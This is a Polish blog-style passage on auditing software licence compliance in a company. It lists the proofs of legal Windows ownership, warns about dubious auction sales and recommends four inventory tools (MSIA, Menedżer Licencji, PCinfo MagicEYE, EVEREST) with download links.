7. Raport końcowy:
7.1. Opis zakresu przeprowadzonych prac audytowych w firmie.
7.2. Analiza danych zebranych w procesie skanowania i inwentaryzacji oprogramowania.
7.3. Baza danych – nośnik optyczny (CD/DVD) zawierający informacje o prowadzonych działaniach.
7.4. Wydanie wniosku o certyfikację.

Inną kwestią są sprzedawane na allegro lub innych aukcjach niby oryginalne Windowsy w okazyjnych cenach. Zazwyczaj sprzedawca nie wystawia faktury lub są to wersje systemów dedykowane dla danych producentów i używanie ich jest złamaniem licencji. Kupując takie Windowsy pamiętajmy, że według standardów BSA i Microsoft dowodami legalnego oprogramowania są:
1) Certyfikat Autentyczności COA (w przypadku systemu operacyjnego) – główny dowód legalnego systemu operacyjnego. Naklejka naklejana na obudowę stacji roboczej.
2) Licencja – prawo do korzystania z oprogramowania na warunkach określonych przez jego twórcę.
3) Oryginalny nośnik/i
4) Pudełko – wyłącznie w wersji BOX
5) Poprawnie wystawiona faktura zakupu – ! UWAGA ! – sama licencja nie jest dowodem legalnego oprogramowania

Skupmy się teraz na oprogramowaniu. Oprogramowanie wspomagające proces audytu informatycznego umożliwia precyzyjną kontrolę legalności poprzez automatyzację ww. czynności.
Specjalistyczne programy do audytu IT dysponują funkcją jednoznacznej identyfikacji każdego zainstalowanego w sieci lokalnej pakietu oprogramowania oraz dodatkowo są one z reguły odporne na działania samych użytkowników, którzy mogą próbować zatuszować obecność nielicencjonowanych kopii programów na swoich komputerach. W internecie można znaleźć wile tego typu narzędzi. Ściągając je uważajmy żeby samemu nie złamać zapisów zawartych w licencji;] Osobiście polecałbym zainteresować się tymi programami :

1. Microsoft Software Inventory Analyser (MSIA)
Microsoft Software Inventory Analyser (MSIA) to bezpłatne narzędzie wyszukujące informacje o oprogramowaniu firmy Microsoft zainstalowanym na poszczególnych komputerach. Korzystając z tego narzędzia, można przeprowadzić inwentaryzację wszystkich najpopularniejszych produktów Microsoft zainstalowanych na wszystkich komputerach w firmowej sieci. Rezultaty skanowania przeprowadzonego przez MSIA są prezentowane w eleganckich raportach i jak zapewnia producent, są całkowicie poufne i nie są wysyłane do firmy Microsoft. Program umożliwia także wprowadzenie ilości posiadanych licencji tak aby w łatwy sposób można było wykryć ich niedobór bądź nadmiar.
http://www.dobreprogramy.pl/Software-Inventory-Analyser,Program,Windows,12690.html

2. Menedżer Licencji
Polski program służący do inwentaryzacji oprogramowania w firmie. Menedżer Licencji pozwala zdalnie pobrać informacje o zainstalowanym oprogramowaniu ze wszystkich firmowych komputerów w sieci lokalnej. Opcjonalnie możne je też przenieść na dyskietkach. Informacje pobierane są o wszelkiego rodzaju programach dzięki czemu można kontrolować nie tylko aplikacje komercyjne ale np. sprawdzać czy na poszczególnych stanowiskach nie ma zainstalowanych programów niepożądanych (np. do bezpośredniej wymiany plików w sieciach p2p). Program generuje raporty w popularnych formatach, według stanowisk komputerowych lub nazw własnych programów. Spis posiadanych licencji pozwoli porównać listę zainstalowanych programów z licencjami uprawniającymi do ich używania.
http://www.dobreprogramy.pl/Menedzer-Licencji,Program,Windows,12244.html

3. PCinfo MagicEYE
Rozbudowany system do audytu oprogramowania i zarządzania zasobami IT w firmach. PCinfo MagicEYE umożliwia przeprowadzanie bardzo szczegółowej ewidencji posiadanych komputerów, podzespołów komputerowych i innych urządzeń informatycznych, a także precyzyjne wykrywanie zainstalowanego na komputerach oprogramowania (opcjonalnie także plików graficznych, muzycznych czy filmów). Wszelkie dane pobierane są z instalowanych zdalnie agentów rezydujących na poszczególnych końcówkach w sieci i wyświetlane na stanowisku administratora. Od wersji 5 możliwe jest także sprawdzanie komputerów pracujących pod kontrolą systemu Linux. Program umożliwia wprowadzenie liczby posiadanych licencji na oprogramowanie dzięki czemu można w łatwy sposób wychwycić ewentualne różnice, a także sprawdzić na jakich konkretnie komputerach zainstalowane jest dane oprogramowanie.
http://www.dobreprogramy.pl/PCinfo-MagicEYE,Program,Windows,12569.html

4. EVEREST Ultimate Edition
EVEREST oferuje możliwość gromadzenia informacji o sprzęcie i oprogramowaniu w postaci plików CSV lub bazy danych SQL i pozwala przeprowadzić wyczerpujący audyt sieci w oparciu o zebrane informacje. Wybrane informacje sprzętowe:
Płyta główna i procesor, karta graficzna i monitor, urządzenia pamięci masowej, karty sieciowe, multimedia, urządzenia wejściowe, pozostały sprzęt (informacje o urządzeniach PCI, Plug & Play, PCMCIA i USB, porty komunikacyjne, informacje o zarządzaniu energią, lista zasobów sprzętowych, informacje o drukarkach). Informacje o oprogramowaniu: System operacyjny, serwer i wyświetlanie, praca w sieci, informacje o zainstalowanym oprogramowaniu, zaplanowanych zadaniach, programach uruchamiania i rozwiązaniach antywirusowych.
http://www.instalki.pl/programy/download/testowanie_i_diagnostyka/EVEREST_Ultimate_Edition.php

Skuteczna, systematyczna kontrola legalności oprogramowania jest konieczna w każdej firmie. Praktycznie nie ma firmy, w której nie znajduje się choćby jeden pakiet oprogramowania nieposiadający odpowiedniej licencji. Kontrola legalności oprogramowania ma nie tylko ustalić, jaki jest stan faktyczny zainstalowanego oprogramowania i licencji, ale w efekcie ma doprowadzić do wprowadzenia procedur zarządzania oprogramowaniem oraz do efektywnego i świadomego kupowania nowych licencji.

Linki :
Po co Ci audyt legalności oprogramowania?
Dowody legalności
Kontrola legalności oprogramowania